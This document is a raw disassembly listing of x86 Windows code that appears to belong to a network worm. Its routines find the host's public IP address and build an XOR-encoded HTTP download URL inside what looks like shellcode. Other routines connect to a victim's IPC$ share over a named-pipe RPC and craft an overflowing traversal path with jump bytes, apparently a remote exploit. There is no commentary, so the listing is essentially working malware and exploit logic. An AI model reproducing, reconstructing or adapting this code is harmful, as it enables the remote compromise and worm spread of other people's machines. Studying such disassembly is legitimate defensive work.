push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_34]
push eax
push esi
push dword ptr [edi]
call sub_9B2D2B
add esp, 3Ch
mov [ebp+var_2C], eax
cmp eax, ebx
jnz short loc_9A6FB3
push [ebp+arg_4]
lea eax, [ebp+var_B8]
push eax
call dword_9A115C ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9A6FB3
push offset dword_9A1354
lea eax, [ebp+var_20]
push eax
call dword_9A115C ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9A6FB3
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
push esi
push dword ptr [edi]
call sub_9B2C56
add esp, 10h
mov [ebp+var_48], eax
loc_9A6FB3: ; CODE XREF: sub_9A6EE2+8E�j
; sub_9A6EE2+A4�j ...
inc [ebp+var_1C]
cmp [ebp+var_2C], ebx
jz loc_9A6EFB
jmp short loc_9A6FC8
; ---------------------------------------------------------------------------
loc_9A6FC1: ; DATA XREF: .text:stru_9A1360�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A6FC5: ; DATA XREF: .text:stru_9A1360�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A6FC8: ; CODE XREF: sub_9A6EE2+DD�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9A6EE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6FD2 proc near ; CODE XREF: sub_9A8A08+109�p
var_74C = byte ptr -74Ch
var_2C8 = byte ptr -2C8h
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 73Ch
push offset stru_9A1370
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_3C], bl
xor eax, eax
lea edi, [ebp+var_3B]
stosd
stosd
stosd
stosw
stosb
mov [ebp+var_2C], bl
xor eax, eax
lea edi, [ebp+var_2B]
stosd
stosd
stosd
stosw
stosb
push [ebp+arg_8]
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_74C]
push eax
lea eax, [ebp+var_48]
push eax
call sub_9A6E48
add esp, 10h
test eax, eax
jz short loc_9A706A
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_48]
call sub_9B2A48
add esp, 0Ch
cmp [ebp+var_2C], bl
jz short loc_9A706A
lea eax, [ebp+var_3C]
push eax
mov esi, dword_9A12B0
call esi ; dword_9A12B0
mov ecx, [ebp+arg_0]
mov [ecx], eax
lea eax, [ebp+var_2C]
push eax
call esi ; dword_9A12B0
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ebp+var_1C], 1
jmp short loc_9A706A
; ---------------------------------------------------------------------------
loc_9A7063: ; DATA XREF: .text:stru_9A1370�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7067: ; DATA XREF: .text:stru_9A1370�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A706A: ; CODE XREF: sub_9A6FD2+4F�j
; sub_9A6FD2+6A�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A6FD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7077 proc near ; CODE XREF: sub_9A8A08+17A�p
var_78C = byte ptr -78Ch
var_308 = byte ptr -308h
var_88 = byte ptr -88h
var_78 = byte ptr -78h
var_58 = byte ptr -58h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2B = byte ptr -2Bh
var_28 = byte ptr -28h
var_23 = byte ptr -23h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 77Ch
push offset stru_9A1380
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_50], bl
xor eax, eax
lea edi, [ebp+var_4F]
stosd
stosd
stosd
stosw
stosb
movzx eax, [ebp+arg_0]
push eax
push offset dword_9A137C
push 6
lea eax, [ebp+var_30]
push eax
mov edi, dword_9A11D4
call edi ; dword_9A11D4
mov [ebp+var_2B], bl
push [ebp+arg_8]
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_78C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_9A6E48
add esp, 20h
test eax, eax
jz loc_9A71AD
lea eax, [ebp+var_78]
push eax
push 20h
pop ebx
call sub_9A6DB9
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_78C]
push eax
lea ecx, [ebp+var_40]
call sub_9A6EE2
add esp, 0Ch
mov esi, [ebp+arg_4]
mov word ptr [esi], 50h
and [ebp+var_1C], 0
mov ebx, offset dword_9A1354
loc_9A710C: ; CODE XREF: sub_9A7077+121�j
cmp [ebp+var_1C], 3
jge loc_9A71AD
movzx eax, word ptr [esi]
push eax
push offset dword_9A137C
push 6
lea eax, [ebp+var_28]
push eax
call edi ; dword_9A11D4
mov [ebp+var_23], 0
push ebx
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_308]
push eax
push [ebp+var_40]
call sub_9B2B1F
add esp, 2Ch
mov [ebp+var_34], eax
test eax, eax
jnz short loc_9A717E
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_88]
push eax
push ebx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_308]
push eax
push [ebp+var_40]
call sub_9B2F2C
add esp, 18h
mov [ebp+var_34], eax
test eax, eax
jz short loc_9A719D
loc_9A717E: ; CODE XREF: sub_9A7077+DC�j
call dword_9A11D8 ; rand
cdq
mov ecx, 2310h
idiv ecx
add edx, 400h
mov [esi], dx
inc [ebp+var_1C]
jmp loc_9A710C
; ---------------------------------------------------------------------------
loc_9A719D: ; CODE XREF: sub_9A7077+105�j
mov [ebp+var_20], 1
jmp short loc_9A71AD
; ---------------------------------------------------------------------------
loc_9A71A6: ; DATA XREF: .text:stru_9A1380�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A71AA: ; DATA XREF: .text:stru_9A1380�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A71AD: ; CODE XREF: sub_9A7077+5C�j
; sub_9A7077+99�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9A7077 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A71BA proc near ; CODE XREF: sub_9A728D+7C�p
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 28h
push offset stru_9A13E8
call __SEH_prolog
or [ebp+var_20], 0FFFFFFFFh
mov esi, ecx
xor ebx, ebx
mov [ebp+var_38], bl
xor eax, eax
lea edi, [ebp+var_37]
stosd
stosd
stosd
stosw
stosb
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_1C], ebx
loc_9A71E2: ; CODE XREF: sub_9A71BA+3C�j
cmp [ebp+var_1C], edx
jnb short loc_9A71F8
mov eax, [ebp+var_1C]
add eax, ecx
cmp [eax], bl
jnz short loc_9A71F3
mov byte ptr [eax], 20h
loc_9A71F3: ; CODE XREF: sub_9A71BA+34�j
inc [ebp+var_1C]
jmp short loc_9A71E2
; ---------------------------------------------------------------------------
loc_9A71F8: ; CODE XREF: sub_9A71BA+2B�j
mov [ecx+edx-1], bl
push ecx
call dword_9A11C0 ; _strlwr
pop ecx
loc_9A7204: ; CODE XREF: sub_9A71BA+77�j
; sub_9A71BA+7C�j ...
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_9A7280
push offset aIpAddress ; "ip address"
push esi
call dword_9A11C4 ; strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz short loc_9A7280
add esi, 0Ah
mov [ebp+var_24], esi
xor ecx, ecx
loc_9A7229: ; CODE XREF: sub_9A71BA+BD�j
mov [ebp+var_1C], ecx
mov al, [ecx+esi]
cmp al, bl
jz short loc_9A7204
cmp ecx, 0Fh
jnb short loc_9A7204
cmp al, 30h
jl short loc_9A7276
cmp al, 39h
jg short loc_9A7276
xor edx, edx
loc_9A7242: ; CODE XREF: sub_9A71BA+A8�j
mov [ebp+var_28], edx
cmp edx, 0Fh
jnb short loc_9A7264
mov al, [ecx+esi]
cmp al, 30h
jl short loc_9A7255
cmp al, 39h
jle short loc_9A7259
loc_9A7255: ; CODE XREF: sub_9A71BA+95�j
cmp al, 2Eh
jnz short loc_9A7264
loc_9A7259: ; CODE XREF: sub_9A71BA+99�j
mov [ebp+edx+var_38], al
inc ecx
mov [ebp+var_1C], ecx
inc edx
jmp short loc_9A7242
; ---------------------------------------------------------------------------
loc_9A7264: ; CODE XREF: sub_9A71BA+8E�j
; sub_9A71BA+9D�j
mov [ebp+edx+var_38], bl
lea eax, [ebp+var_38]
push eax
call sub_9B34B4 ; inet_addr
mov [ebp+var_20], eax
jmp short loc_9A7204
; ---------------------------------------------------------------------------
loc_9A7276: ; CODE XREF: sub_9A71BA+80�j
; sub_9A71BA+84�j
inc ecx
jmp short loc_9A7229
; ---------------------------------------------------------------------------
loc_9A7279: ; DATA XREF: .text:stru_9A13E8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A727D: ; DATA XREF: .text:stru_9A13E8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7280: ; CODE XREF: sub_9A71BA+4E�j
; sub_9A71BA+65�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9A71BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A728D proc near ; CODE XREF: sub_9A8A08+244�p
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 28h
push offset stru_9A13F8
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+var_38], ebx
xor eax, eax
lea edi, [ebp+var_34]
stosd
stosd
mov [ebp+ms_exc.disabled], ebx
push ebx
lea eax, [ebp+var_24]
push eax
call dword_9A1240
test eax, eax
jz short loc_9A7333
mov [ebp+var_20], ebx
loc_9A72BE: ; CODE XREF: sub_9A728D+56�j
; sub_9A728D+9D�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_9A7333
cmp [ebp+var_20], 3
jnb short loc_9A7333
call dword_9A11D8 ; rand
xor edx, edx
push 3
pop ecx
div ecx
mov [ebp+var_24], edx
mov eax, edx
shl eax, 2
cmp [ebp+eax+var_38], ebx
jnz short loc_9A72BE
lea ecx, [ebp+var_28]
push ecx
push off_9B5010[eax]
call sub_9A8471
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_2C], esi
cmp esi, ebx
jz short loc_9A731C
mov edx, [ebp+var_28]
cmp edx, 8
jb short loc_9A7311
mov ecx, esi
call sub_9A71BA
mov [ebp+var_1C], eax
loc_9A7311: ; CODE XREF: sub_9A728D+78�j
cmp esi, ebx
jz short loc_9A731C
push esi
call dword_9A10BC ; GlobalFree
loc_9A731C: ; CODE XREF: sub_9A728D+70�j
; sub_9A728D+86�j
mov eax, [ebp+var_24]
mov [ebp+eax*4+var_38], 1
inc [ebp+var_20]
jmp short loc_9A72BE
; ---------------------------------------------------------------------------
loc_9A732C: ; DATA XREF: .text:stru_9A13F8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7330: ; DATA XREF: .text:stru_9A13F8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7333: ; CODE XREF: sub_9A728D+2C�j
; sub_9A728D+35�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A728D endp
; =============== S U B R O U T I N E =======================================
sub_9A7348 proc near ; DATA XREF: .text:009A398C�o
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_9A11BC ; malloc
pop ecx
retn 4
sub_9A7348 endp
; =============== S U B R O U T I N E =======================================
sub_9A7356 proc near ; DATA XREF: .text:009A3990�o
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_9A11D0 ; free
pop ecx
retn 4
sub_9A7356 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7364 proc near ; CODE XREF: sub_9A85F4+1D�p
; sub_9A87A8+32�p
var_80 = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 80h
mov eax, [ebp+arg_8]
push esi
push offset dword_9B5614
push [ebp+arg_C]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_8+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+var_80]
push 80h
push eax
call dword_9A11D4 ; _snprintf
lea eax, [ebp+var_80]
push eax
mov [ebp+var_1], 0
call sub_9B322E ; strlen
add esp, 28h
add eax, 0B9h
push eax
push 40h
call dword_9A10C0 ; GlobalAlloc
test eax, eax
mov esi, [ebp+arg_0]
mov [esi], eax
jz loc_9A7451
push ebx
push edi
mov edi, 0B4h
push edi
push offset dword_9A1408
push eax
call sub_9B323A ; memcpy
lea eax, [ebp+var_80]
push eax
call sub_9B322E ; strlen
inc eax
push eax
lea eax, [ebp+var_80]
push eax
mov eax, [esi]
add eax, edi
push eax
call sub_9B323A ; memcpy
push 15h
lea eax, [ebp+var_80]
pop edi
push eax
call sub_9B322E ; strlen
mov ebx, 0B5h
add eax, ebx
add esp, 20h
cmp eax, edi
jbe short loc_9A742B
loc_9A7413: ; CODE XREF: sub_9A7364+C5�j
mov eax, [esi]
add eax, edi
xor byte ptr [eax], 0C4h
lea eax, [ebp+var_80]
push eax
inc edi
call sub_9B322E ; strlen
add eax, ebx
cmp edi, eax
pop ecx
jb short loc_9A7413
loc_9A742B: ; CODE XREF: sub_9A7364+AD�j
mov eax, [esi]
mov byte ptr [edi+eax], 45h
mov eax, [esi]
mov byte ptr [eax+edi+1], 50h
mov eax, [esi]
mov byte ptr [eax+edi+2], 0
push dword ptr [esi]
call sub_9B322E ; strlen
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
pop edi
inc eax
pop ebx
loc_9A7451: ; CODE XREF: sub_9A7364+63�j
pop esi
leave
retn
sub_9A7364 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7454 proc near ; CODE XREF: sub_9A78CC+68�p
var_120 = byte ptr -120h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push [ebp+arg_0]
lea eax, [ebp+var_120]
push offset aSIpc ; "\\\\%s\\IPC$"
push 100h
push eax
call dword_9A11D4 ; _snprintf
push 20h
lea eax, [ebp+var_20]
push 0
push eax
mov [ebp+var_21], 0
call sub_9B3240 ; memset
add esp, 1Ch
mov eax, offset byte_9A14D5
push 0
push eax
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
lea ecx, [ebp+var_120]
push eax
mov [ebp+var_14], 3
mov [ebp+var_C], ecx
call sub_9B34DE
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9A7454 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A74B7 proc near ; CODE XREF: sub_9A78CC+7D�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset stru_9A1510
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+var_1C], esi
lea eax, [ebp+var_1C]
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
push offset aNcacn_np ; "ncacn_np"
push esi
call dword_9A1208
test eax, eax
jnz short loc_9A74F8
push offset dword_9B785C
push [ebp+var_1C]
call dword_9A120C
cmp eax, esi
jz short loc_9A74FC
loc_9A74F8: ; CODE XREF: sub_9A74B7+2D�j
xor eax, eax
jmp short loc_9A7545
; ---------------------------------------------------------------------------
loc_9A74FC: ; CODE XREF: sub_9A74B7+3F�j
mov [ebp+ms_exc.disabled], esi
push esi
push 4
push offset aM ; "M"
push offset aS ; "S"
push offset aAaa ; "AAA"
call sub_9AC439
add esp, 14h
mov [ebp+var_20], 1
jmp short loc_9A7533
; ---------------------------------------------------------------------------
loc_9A7522: ; DATA XREF: .text:stru_9A1510�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7530: ; DATA XREF: .text:stru_9A1510�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7533: ; CODE XREF: sub_9A74B7+69�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset dword_9B785C
call dword_9A1210
mov eax, [ebp+var_20]
loc_9A7545: ; CODE XREF: sub_9A74B7+43�j
call __SEH_epilog
retn
sub_9A74B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A754B proc near ; CODE XREF: sub_9A7607+269�p
var_410 = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 400h
push offset stru_9A1540
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+var_1C], esi
lea eax, [ebp+var_1C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push offset aNcacn_np ; "ncacn_np"
push esi
call dword_9A1208
test eax, eax
jnz short loc_9A758F
push offset dword_9B785C
push [ebp+var_1C]
call dword_9A120C
cmp eax, esi
jz short loc_9A7593
loc_9A758F: ; CODE XREF: sub_9A754B+30�j
xor eax, eax
jmp short loc_9A7601
; ---------------------------------------------------------------------------
loc_9A7593: ; CODE XREF: sub_9A754B+42�j
mov [ebp+ms_exc.disabled], esi
push 3E8h
push esi
lea eax, [ebp+var_410]
push eax
call sub_9B3240 ; memset
mov [ebp+var_24], 101h
push esi
lea eax, [ebp+var_24]
push eax
push offset asc_9A1538 ; "\\"
push 31Fh
lea eax, [ebp+var_410]
push eax
push [ebp+arg_0]
push offset aHhdhh ; "HHDHH"
call sub_9AC417
add esp, 28h
mov [ebp+var_20], 1
jmp short loc_9A75EF
; ---------------------------------------------------------------------------
loc_9A75DE: ; DATA XREF: .text:stru_9A1540�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_28], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A75EC: ; DATA XREF: .text:stru_9A1540�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A75EF: ; CODE XREF: sub_9A754B+91�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset dword_9B785C
call dword_9A1210
mov eax, [ebp+var_20]
loc_9A7601: ; CODE XREF: sub_9A754B+46�j
call __SEH_epilog
retn
sub_9A754B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7607 proc near ; CODE XREF: sub_9A78CC+9A�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 88h
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aD_D_D_D ; "\\\\%d.%d.%d.%d"
lea eax, [ebp+var_88]
push 80h
push eax
call dword_9A11D4 ; _snprintf
add esp, 1Ch
push ebx
push esi
xor edx, edx
xor eax, eax
mov ecx, 2B8h
push edi
loc_9A764E: ; CODE XREF: sub_9A7607+63�j
mov esi, [ebp+arg_C]
cmp dword_9B5020[eax], esi
jnz short loc_9A7664
mov edi, dword_9B5024[eax]
cmp edi, [ebp+arg_10]
jz short loc_9A76B0
loc_9A7664: ; CODE XREF: sub_9A7607+50�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9A764E
xor edx, edx
xor eax, eax
loc_9A7670: ; CODE XREF: sub_9A7607+80�j
cmp dword_9B5020[eax], esi
jnz short loc_9A7681
cmp dword_9B5024[eax], 9
jz short loc_9A76B0
loc_9A7681: ; CODE XREF: sub_9A7607+6F�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9A7670
xor ebx, ebx
loc_9A768B: ; CODE XREF: sub_9A7607+B3�j
test ebx, ebx
jz short loc_9A76A9
cmp [ebp+arg_8], 190h
ja short loc_9A76A9
push 262h
call sub_9A80F1
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9A76BC
loc_9A76A9: ; CODE XREF: sub_9A7607+86�j
; sub_9A7607+8F�j
xor eax, eax
jmp loc_9A7882
; ---------------------------------------------------------------------------
loc_9A76B0: ; CODE XREF: sub_9A7607+5B�j
; sub_9A7607+78�j
lea ebx, [edx+edx*2]
lea ebx, ds:9B5020h[ebx*8]
jmp short loc_9A768B
; ---------------------------------------------------------------------------
loc_9A76BC: ; CODE XREF: sub_9A7607+A0�j
push 2
push offset asc_9A1538 ; "\\"
push edi
call sub_9B323A ; memcpy
add esp, 0Ch
lea esi, [edi+2]
mov [ebp+var_4], 1F4h
loc_9A76D6: ; CODE XREF: sub_9A7607+F4�j
call dword_9A11D8 ; rand
and al, 1
shl al, 5
or al, 41h
mov byte ptr [ebp+arg_0+3], al
call dword_9A11D8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, byte ptr [ebp+arg_0+3]
mov [esi], dl
inc esi
dec [ebp+var_4]
jnz short loc_9A76D6
push [ebp+arg_8]
lea eax, [edi+66h]
push [ebp+arg_4]
push eax
call sub_9B323A ; memcpy
push 0Eh
lea eax, [edi+1F6h]
push offset a____ ; "\\..\\..\\"
push eax
call sub_9B323A ; memcpy
lea eax, [edi+204h]
mov word ptr [eax], 41h
add esp, 18h
inc eax
inc eax
and [ebp+arg_0], 0
mov [ebp+var_8], eax
lea eax, [edi+206h]
mov esi, 206h
mov [ebp+var_4], eax
loc_9A7744: ; CODE XREF: sub_9A7607+15C�j
; sub_9A7607+172�j
call dword_9A11D8 ; rand
cdq
push 19h
pop ecx
idiv ecx
mov ecx, [ebp+var_8]
lea eax, [edx+42h]
mov edx, [ebp+var_4]
cmp ecx, edx
mov [edx], ax
jnb short loc_9A776C
loc_9A7760: ; CODE XREF: sub_9A7607+163�j
cmp [ecx], ax
jz short loc_9A7744
inc ecx
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_9A7760
loc_9A776C: ; CODE XREF: sub_9A7607+157�j
inc [ebp+arg_0]
add [ebp+var_4], 2
inc esi
inc esi
cmp [ebp+arg_0], 6
jb short loc_9A7744
mov dword ptr [esi+edi], 20408h
add esi, 4
cmp [ebp+arg_C], 6
jz loc_9A7824
cmp [ebp+arg_C], 7
jz loc_9A7824
mov eax, [ebx+0Ch]
and [ebp+var_8], 0
test eax, eax
jnz short loc_9A77A7
loc_9A77A4: ; CODE XREF: sub_9A7607+224�j
mov eax, [ebx+8]
loc_9A77A7: ; CODE XREF: sub_9A7607+19B�j
mov [esi+edi], eax
add esi, 4
lea eax, [esi+46h]
cmp esi, eax
mov [ebp+arg_0], esi
jnb short loc_9A77D7
loc_9A77B7: ; CODE XREF: sub_9A7607+1CE�j
call dword_9A11D8 ; rand
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add dl, 41h
inc [ebp+arg_0]
mov [eax+edi], dl
lea eax, [esi+46h]
cmp [ebp+arg_0], eax
jb short loc_9A77B7
loc_9A77D7: ; CODE XREF: sub_9A7607+1AE�j
add esi, edi
cmp [ebp+var_8], 0
jz short loc_9A7830
lea eax, [ebx+8]
mov ecx, [eax]
mov [esi], ecx
mov ecx, [eax]
mov [esi+4], ecx
mov ecx, [eax]
mov [esi+8], ecx
mov ecx, [eax]
mov [esi+0Ch], ecx
mov eax, [eax]
mov [esi+10h], eax
mov eax, [ebx+0Ch]
mov [esi+14h], eax
mov eax, [ebx+14h]
mov [esi+18h], eax
mov eax, [ebx+10h]
mov [esi+38h], eax
mov eax, [ebx+10h]
mov [esi+3Ch], eax
mov byte ptr [esi+40h], 0EBh
mov byte ptr [esi+41h], 2
mov byte ptr [esi+44h], 0EBh
mov byte ptr [esi+45h], 58h
jmp short loc_9A785E
; ---------------------------------------------------------------------------
loc_9A7824: ; CODE XREF: sub_9A7607+182�j
; sub_9A7607+18C�j
mov [ebp+var_8], 1
jmp loc_9A77A4
; ---------------------------------------------------------------------------
loc_9A7830: ; CODE XREF: sub_9A7607+1D6�j
mov eax, [ebx+8]
push 8
mov [esi+4], eax
lea eax, [esi+32h]
push offset dword_9A155C
push eax
call sub_9B323A ; memcpy
add esp, 0Ch
mov byte ptr [esi+3Ah], 0EBh
cmp dword ptr [ebx+0Ch], 0
setnz al
lea eax, ds:5Ah[eax*8]
mov [esi+3Bh], al
loc_9A785E: ; CODE XREF: sub_9A7607+21B�j
and word ptr [esi+46h], 0
push offset dword_9A154C
lea eax, [ebp+var_88]
push eax
push edi
call sub_9A754B
push edi
mov esi, eax
call sub_9A8105
add esp, 10h
mov eax, esi
loc_9A7882: ; CODE XREF: sub_9A7607+A4�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A7607 endp
; =============== S U B R O U T I N E =======================================
sub_9A7887 proc near ; CODE XREF: sub_9A78CC+59�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 1BDh
push [esp+4+arg_0]
call sub_9ABADB
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_9A78C9
dec eax
dec eax
jz short loc_9A78BD
dec eax
jz short loc_9A78B9
dec eax
jz short loc_9A78B5
dec eax
jz short loc_9A78B1
dec eax
jnz short loc_9A78C9
push 7
loc_9A78AE: ; CODE XREF: sub_9A7887+2C�j
; sub_9A7887+30�j ...
pop eax
jmp short loc_9A78BF
; ---------------------------------------------------------------------------
loc_9A78B1: ; CODE XREF: sub_9A7887+20�j
push 6
jmp short loc_9A78AE
; ---------------------------------------------------------------------------
loc_9A78B5: ; CODE XREF: sub_9A7887+1D�j
push 5
jmp short loc_9A78AE
; ---------------------------------------------------------------------------
loc_9A78B9: ; CODE XREF: sub_9A7887+1A�j
push 2
jmp short loc_9A78AE
; ---------------------------------------------------------------------------
loc_9A78BD: ; CODE XREF: sub_9A7887+17�j
xor eax, eax
loc_9A78BF: ; CODE XREF: sub_9A7887+28�j
mov ecx, [esp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A78C9: ; CODE XREF: sub_9A7887+13�j
; sub_9A7887+23�j
xor eax, eax
retn
sub_9A7887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A78CC proc near ; CODE XREF: sub_9A85F4+A4�p
; sub_9A87A8+75�p
var_180 = byte ptr -180h
var_80 = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 180h
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, dword_9A11D4
push edi
mov eax, ebx
shr eax, 18h
push eax
movzx eax, byte ptr [ebp+arg_0+2]
push eax
movzx eax, bh
push eax
mov eax, ebx
and eax, 0FFh
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea eax, [ebp+var_80]
push 80h
push eax
call esi ; dword_9A11D4
or [ebp+arg_0], 0FFFFFFFFh
push ebx
mov [ebp+var_1], 0
call sub_9AC747
movzx edi, ax
add esp, 20h
test edi, edi
jz short loc_9A7995
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_9A7887
test eax, eax
pop ecx
pop ecx
jz short loc_9A7995
lea eax, [ebp+var_80]
push eax
call sub_9A7454
cmp [ebp+arg_0], 2
pop ecx
jnz short loc_9A795B
lea eax, [ebp+var_80]
push offset dword_9A151C
push eax
